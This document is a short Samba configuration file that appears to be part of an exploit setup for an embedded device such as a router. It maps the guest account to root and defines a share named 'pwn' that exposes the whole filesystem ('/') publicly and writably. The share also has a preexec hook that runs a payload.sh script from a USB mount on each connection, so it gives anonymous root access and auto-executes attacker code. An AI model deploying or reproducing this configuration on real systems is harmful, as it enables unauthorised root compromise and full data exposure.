[global]
guest account = root
deadtime = 5
log level = 0
max smbd processes = 3     
server string = Samba Server
security = user
encrypt passwords = yes
smb passwd file = /var/samba/var/smbpasswd
load printers = no
workgroup = workgroup           
netbios name = samba               
short preserve case = yes   
preserve case = yes         
interfaces = 192.168.0.1/24        
server signing = True
[pwn]
Preexec = /mnt/usb1_1_1/payload.sh
comment = samba share dir
read only = no 
public = yes
writable = yes
max connections = 3       
path = /
